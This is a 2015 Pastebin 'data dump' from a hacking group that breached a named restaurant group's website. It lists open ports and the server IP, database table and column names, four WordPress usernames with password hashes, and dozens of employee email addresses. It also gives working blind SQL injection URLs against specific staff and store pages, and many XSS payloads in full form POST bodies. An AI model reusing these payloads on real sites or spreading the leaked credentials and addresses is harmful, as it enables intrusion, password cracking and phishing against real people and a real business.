API tools faq
paste
Advertisement
An0nBlank

www.maxrestaurantgroup.com Data Dump

An0nBlank
Jul 13th, 2015
1,096
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 28.57 KB | None | 0 0
raw download clone embed print report
  1. /$$ /$$ /$$$$$$$$ /$$$$$$
  2. | $$ | $$|__ $$__//$$__ $$
  3. | $$ | $$ | $$ | $$ \__/ /$$$$$$$$
  4. | $$$$$$$$ | $$ | $$ /$$$$|____ /$$/
  5. | $$ | $$ | $$ | $$ \ $$ /$$__/
  6. | $$__ $$ | $$ | $$|_ $$ /$$$$/
  7. | $$ | $$ | $$ | $$ \ $$ /$$__/
  8. | $$ | $$ | $$ | $$$$$$/ /$$$$$$$$
  9. |__/ |__/ |__/ \______/ |________/
  10.  
  11. /$$$$$$ /$$$$$$ /$$$$$$
  12. |_ $$_/ /$$__ $$ /$$__ $$
  13. | $$ | $$ \__/ | $$ \ $$
  14. | $$ | $$$$$$ | $$$$$$$$
  15. | $$ \____ $$ | $$__ $$
  16. | $$ /$$ \ $$ | $$ | $$
  17. /$$$$$$| $$$$$$/ | $$ | $$
  18. |______/ \______/ |__/ |__/
  19.  
  20.  
  21.  
  22. /$$$$$$ /$$$$$$ /$$$$$$$
  23. /$$__ $$ /$$__ $$| $$__ $$
  24. | $$ \__/| $$ \ $$| $$ \ $$
  25. | $$ /$$$$| $$ | $$| $$ | $$
  26. | $$|_ $$| $$ | $$| $$ | $$
  27. | $$|_ $$| $$ | $$| $$ | $$
  28. | $$ \ $$| $$ | $$| $$ | $$
  29. | $$$$$$/| $$$$$$/| $$$$$$$/
  30. \______/ \______/ |_______/
  31.  
  32. Twitter @HTGzSecurity
  33. Facebook https://www.facebook.com/An0nBlank
  34. HTGz Security
  35.  
  36. ~ By HTGz Security
  37.  
  38. #Operation HTGz Security
  39. ++++++++++++++++++++++++++
  40.  
  41. *==================================================================================================*
  42. | Domain: http://www.maxrestaurantgroup.com/ |
  43. | Server: Apache |
  44. | IP: 70.166.50.25 |
  45. |open port 110/tcp on 70.166.50.25 |
  46. |open port 443/tcp on 70.166.50.25 |
  47. |open port 143/tcp on 70.166.50.25 |
  48. |open port 21/tcp on 70.166.50.25 |
  49. |open port 587/tcp on 70.166.50.25 |
  50. |open port 80/tcp on 70.166.50.25 |
  51. |open port 10025/tcp smtp qmail smtpd |
  52. |8443/tcp open http Apache httpd |
  53. *==================================================================================================*
  54. | MD5: f417 9f2f 34a4 7a64 10bb 4ad5 84f4 7a13
  55. |_SHA-1: 494d bead 0570 32bc fca1 b0d9 57f0 8759 1020 c95c
  56. ==========================================================
  57. | MD5: bb3e 1f05 cbd2 936c f532 a72b fd15 c94e
  58. |_SHA-1: 55d8 ef58 302d f696 e170 848f 6a3e 76f2 76de 40cc
  59. ==========================================================
  60. | MD5: fa94 49b1 1b56 4bd1 368b 415f 58d6 1e56
  61. |_SHA-1: a1e9 745b 76b5 5926 a34b 0790 2f48 7a66 55ea 8457
  62.  
  63. http://www.maxrestaurantgroup.com
  64. [200] ActiveX[Flash-ActiveX][D27CDB6E-AE6D-11cf-96B8-444553540000],
  65. Adobe-Flash, Apache[2.x],
  66. Country[UNITED STATES][US],
  67. HTTPServer[Apache],
  68. IP[70.166.50.25],
  69. JQuery, Object["application/x-shockwave-flash]["clsid:D27CDB6E-AE6D-11cf-96B8-444553540000], Script[text/javascript], Title[Welcome to the Max Restaurant Group]
  70.  
  71. databases (2)
  72. information_schema
  73. maxdiningcard
  74.  
  75. Database:maxdiningcard
  76. (76 tables)
  77. *===========================*
  78. | RecordLocks |
  79. | RecycleBin |
  80. | RecycleBinTechSupport |
  81. | categories_12-08-2011 |
  82. | orders_01-11-2012 |
  83. | orders_05-17-2012 |
  84. | orders_backup-07-14-2011 |
  85. | orders_backup-07-15-2011 |
  86. | calendar |
  87. | calendar_events_locations |
  88. | calendar_images_videos |
  89. | categories |
  90. | categories2 |
  91. | coupon_customers |
  92. | coupons |
  93. | coupons_customers |
  94. | customers |
  95. | documents |
  96. | emails |
  97. | grouping_general |
  98. | hits |
  99. | hits_clean |
  100. | ipbans |
  101. | jobs |
  102. | locations |
  103. | max__shipopt |
  104. | max_albums |
  105. | max_blogposts |
  106. | max_blogusers |
  107. | max_categories |
  108. | max_customers |
  109. | max_emails |
  110. | max_galleries |
  111. | max_gallerygroups |
  112. | max_optionitems |
  113. | max_optionproducts |
  114. | max_options |
  115. | max_optionsproducts |
  116. | max_orders |
  117. | max_photos |
  118. | max_products |
  119. | max_products_sold |
  120. | max_promocodes |
  121. | max_subcategories |
  122. | max_watermarks |
  123. | menu |
  124. | menu2 |
  125. | orders |
  126. | orders_TEMP |
  127. | pdfs |
  128. | people |
  129. | phoneorders |
  130. | pressreleases |
  131. | products |
  132. | products_discounts |
  133. | products_htmlemails |
  134. | recipes |
  135. | resumes |
  136. | reviews |
  137. | temp_orders |
  138. | temp_redem_orders |
  139. | thecooper_registrations |
  140. | votes |
  141. | websiteusers |
  142. | wp_ak_twitter |
  143. | wp_commentmeta |
  144. | wp_comments |
  145. | wp_links |
  146. | wp_options |
  147. | wp_postmeta |
  148. | wp_posts |
  149. | wp_term_relationships |
  150. | wp_term_taxonomy |
  151. | wp_terms |
  152. | wp_usermeta |
  153. | wp_users |
  154. *===========================*
  155.  
  156. Database:maxdiningcard
  157. Table:RecycleBin
  158. *============*
  159. | Column |
  160. *============*
  161. | timestamp |
  162. | companyid |
  163. | data |
  164. | id |
  165. | identifier |
  166. | tablename |
  167. *============*
  168.  
  169. Database:maxdiningcard
  170. Table:emails
  171. (5 columns)
  172. *============*
  173. | Column |
  174. *============*
  175. | active |
  176. | companyid |
  177. | email |
  178. | id |
  179. | name |
  180. *============*
  181.  
  182. Database:maxdiningcard
  183. Table:max_emails
  184. (6 columns)
  185. *===========*
  186. | Column |
  187. *===========*
  188. | date |
  189. | email |
  190. | emailfrom |
  191. | emailto |
  192. | id |
  193. | subject |
  194. *===========*
  195.  
  196. Database:maxdiningcard
  197. Table:wp_users
  198. (10 columns)
  199. *=====================*
  200. | Column |
  201. *=====================*
  202. | display_name |
  203. | ID |
  204. | user_activation_key |
  205. | user_email |
  206. | user_login |
  207. | user_nicename |
  208. | user_pass |
  209. | user_registered |
  210. | user_status |
  211. | user_url |
  212. *=====================*
  213.  
  214.  
  215. Database:maxdiningcard
  216. Table:wp_users
  217. (4 entries)
  218. *============*
  219. | user_login |
  220. *============*
  221. | bmitchell |
  222. | bobbyv |
  223. | lmahon |
  224. | newwave |
  225. *============*
  226.  
  227. Database:maxdiningcard
  228. Table:wp_users
  229. (4 entries)
  230. *====================================*
  231. | user_pass |
  232. *====================================*
  233. | $P$B7eMCaH6dU4xxK1rDtKKCua/gjA2qa. |
  234. | $P$BBfY8gLO86CwH8hq7o0XKkve68ShVL1 |
  235. | $P$BslJtgL90o1DXwqh7Ak7lIdN3AZxmB1 |
  236. | $P$BVww4bE3tbNGZ/bhMsW2aXoJe4SrtB0 |
  237. *====================================*
  238.  
  239. Emails:
  240.  
  241. Email ssmith@maxsoysterbar.com
  242. Email dkelly@maxburgerct.com
  243. Email ssmith@maxtavern.com
  244. Email bcooke@maxsoysterbar.com
  245. Email smichalewicz@mrgct.com
  246. Email sharbeclincoln@mrgct.com
  247. Email tdoupence@arthritis.org
  248. Email ssmith@maxburgerct.com
  249. Email dmascolo@trumbullkitchen.com
  250. Email msnook@mrgct.com
  251. Email bkarsky@maxamiaristorante.com
  252. Email bkohnstam@maxamore.com
  253. Email ssmith@maxdowntown.com
  254. Email apurcell@maxsoysterbar.com
  255. Email ssmith@maxamore.com
  256. Email agabriele@maxdowntown.com
  257. Email ssmith@trumbullkitchen.com
  258. Email jobs@maxrestaurantgroup.com
  259. Email mconley@maxamore.com
  260. Email ssmith@maxamiaristorante.com
  261. Email mconley@maxfishct.com
  262. Email maxcares@mrgct.com
  263. Email wpenenori@thecooperrestaurant.com
  264. Email ttaillifer@mrgct.com
  265. Email aconstable@mrgct.com
  266. Email ttaillefer@mrgct.com
  267. Email smiller@mrgct.com
  268. Email abombard@mrgct.com
  269. Email bcosta@maxfishct.com
  270. Email dtoupence@arthritis.org
  271. Email aconstable@maxrestaurantgroup.com
  272. Email maxmail@mrgct.com
  273. Email dkinoshita@maxtavern.com
  274. -------------------------------------------------------------------------------------------------------------------------------------------------
  275. Blind SQL Injection
  276. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amia/staff.php?id=4'+AND+'1'='1
  277. | Keyword: introduction
  278. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/downtown/staff.php?id=2'+AND+'1'='1
  279. | Keyword: Steven
  280. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/oyster/staff.php?id=3'+AND+'1'='1
  281. | Keyword: developed
  282. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/trumbull/staff.php?id=5'+AND+'1'='1
  283. | Keyword: Partner
  284. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amore/staff.php?id=6'+AND+'1'='1
  285. | Keyword: native
  286. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/tavern/staff.php?id=18'+AND+'1'='1
  287. | Keyword: General
  288. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/fish/staff.php?id=22'+AND+'1'='1
  289. | Keyword: Managing
  290. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/burger/staff.php?id=20'+AND+'1'='1
  291. | Keyword: Managing
  292. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/fish/staff.php?id=26'+AND+'1'='1
  293. | Keyword: Executive
  294. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=95+AND+1=1
  295. | Keyword: Valley
  296. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=102+AND+1=1
  297. | Keyword: orders
  298. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=35+AND+1=1
  299. | Keyword: Restaurant
  300. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=92+AND+1=1
  301. | Keyword: Downtown
  302. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=94+AND+1=1
  303. | Keyword: Downtown
  304. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=93+AND+1=1
  305. | Keyword: Restaurant
  306. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amia/staff.php?id=30'+AND+'1'='1
  307. | Keyword: Executive
  308. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amore/staff.php?id=23'+AND+'1'='1
  309. | Keyword: General
  310. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amore/staff.php?id=11'+AND+'1'='1
  311. | Keyword: Executive
  312. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/trumbull/staff.php?id=24'+AND+'1'='1
  313. | Keyword: General
  314. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/downtown/staff.php?id=32'+AND+'1'='1
  315. | Keyword: Executive
  316. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/oyster/staff.php?id=7'+AND+'1'='1
  317. | Keyword: Executive
  318. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/tavern/staff.php?id=29'+AND+'1'='1
  319. | Keyword: Executive
  320. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/burger/staff.php?id=33'+AND+'1'='1
  321. | Keyword: McKenzie
  322. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/burger/staff.php?id=31'+AND+'1'='1
  323. |Keyword: General
  324. -------------------------------------------------------------------------------------------------------------------------------------------------
  325. -------------------------------------------------------------------------------------------------------------------------------------------------
  326. | Cross-Site Scripting (XSS)
  327. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  328. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<script>alert('XSS')</script>&FormVars[Justification]=123
  329. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  330. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<IMG SRC="javascript:alert('XSS');">&FormVars[Justification]=123
  331. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  332. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&FormVars[Justification]=123
  333. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  334. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&FormVars[Justification]=123
  335. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  336. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&FormVars[Justification]=123
  337. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  338. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<body onload="javascript:alert('XSS')"></body>&FormVars[Justification]=123
  339. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  340. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<table background="javascript:alert('XSS')"></table>&FormVars[Justification]=123
  341. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  342. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<script>alert('XSS')</script>
  343. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  344. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<IMG SRC="javascript:alert('XSS');">
  345. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  346. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  347. | Vul (XSS)] http://www.maxrestaurantgroup.com/charity-form.php
  348. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
  349. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  350. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<DIV STYLE="background-image: url(javascript:alert('XSS'))">
  351. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  352. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<body onload="javascript:alert('XSS')"></body>
  353. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  354. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<table background="javascript:alert('XSS')"></table>
  355. -------------------------------------------------------------------------------------------------------------------------------------------------
  356.  
  357. SF:B0,"\*\x20OK\x20\[CAPABILITY\x20IMAP4rev1\x20UIDPLUS\x20CHILDREN\x20NAM
  358. SF:ESPACE\x20THREAD=ORDEREDSUBJECT\x20THREAD=REFERENCES\x20SORT\x20QUOTA\x
  359. SF:20AUTH=CRAM-MD5\x20AUTH=CRAM-SHA1\x20AUTH=PLAIN\x20IDLE\x20ACL\x20ACL2=
  360. SF:UNION\x20STARTTLS\]\r\n")%r(GetRequest,112,"\*\x20OK\x20\[CAPABILITY\x2
  361. SF:0IMAP4rev1\x20UIDPLUS\x20CHILDREN\x20NAMESPACE\x20THREAD=ORDEREDSUBJECT
  362. SF:\x20THREAD=REFERENCES\x20SORT\x20QUOTA\x20AUTH=CRAM-MD5\x20AUTH=CRAM-SH
  363. SF:A1\x20AUTH=PLAIN\x20IDLE\x20ACL\x20ACL2=UNION\x20STARTTLS\]\r\nGET\x20N
  364. SF:O\x20Error\x20in\x20IMAP\x20command\x20received\x20by\x20server\.\r\n\*
  365. SF:\x20NO\x20Error\x20in\x20IMAP\x20command\x20received\x20by\x20server\.\
  366. SF:r\n")%r(GenericLines,110,"\*\x20OK\x20\[CAPABILITY\x20IMAP4rev1\x20UIDP
  367. SF:LUS\x20CHILDREN\x20NAMESPACE\x20THREAD=ORDEREDSUBJECT\x20THREAD=REFEREN
  368. SF:CES\x20SORT\x20QUOTA\x20AUTH=CRAM-MD5\x20AUTH=CRAM-SHA1\x20AUTH=PLAIN\x
  369. SF:20IDLE\x20ACL\x20ACL2=UNION\x20STARTTLS\]\r\n\*\x20NO\x20Error\x20in\x2
  370. SF:0IMAP\x20command\x20received\x20by\x20server\.\r\n\*\x20NO\x20Error\x20
  371. SF:in\x20IMAP\x20command\x20received\x20by\x20server\.\r\n")%r(HTTPOptions
  372. SF:,116,"\*\x20OK\x20\[CAPABILITY\x20IMAP4rev1\x20UIDPLUS\x20CHILDREN\x20N
  373. SF:AMESPACE\x20THREAD=ORDEREDSUBJECT\x20THREAD=REFERENCES\x20SORT\x20QUOTA
  374. SF:\x20AUTH=CRAM-MD5\x20AUTH=CRAM-SHA1\x20AUTH=PLAIN\x20IDLE\x20ACL\x20ACL
  375. SF:2=UNION\x20STARTTLS\]\r\nOPTIONS\x20NO\x20Error\x20in\x20IMAP\x20comman
  376. SF:d\x20received\x20by\x20server\.\r\n\*\x20NO\x20Error\x20in\x20IMAP\x20c
  377. SF:ommand\x20received\x20by\x20server\.\r\n")%r(RTSPRequest,116,"\*\x20OK\
  378. SF:x20\[CAPABILITY\x20IMAP4rev1\x20UIDPLUS\x20CHILDREN\x20NAMESPACE\x20THR
  379. SF:EAD=ORDEREDSUBJECT\x20THREAD=REFERENCES\x20SORT\x20QUOTA\x20AUTH=CRAM-M
  380. SF:D5\x20AUTH=CRAM-SHA1\x20AUTH=PLAIN\x20IDLE\x20ACL\x20ACL2=UNION\x20STAR
  381. SF:TTLS\]\r\nOPTIONS\x20NO\x20Error\x20in\x20IMAP\x20command\x20received\x
  382. SF:20by\x20server\.\r\n\*\x20NO\x20Error\x20in\x20IMAP\x20command\x20recei
  383. SF:ved\x20by\x20server\.\r\n")%r(RPCCheck,B0,"\*\x20OK\x20\[CAPABILITY\x20
  384. SF:IMAP4rev1\x20UIDPLUS\x20CHILDREN\x20NAMESPACE\x20THREAD=ORDEREDSUBJECT\
  385. SF:x20THREAD=REFERENCES\x20SORT\x20QUOTA\x20AUTH=CRAM-MD5\x20AUTH=CRAM-SHA
  386. SF:1\x20AUTH=PLAIN\x20IDLE\x20ACL\x20ACL2=UNION\x20STARTTLS\]\r\n");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!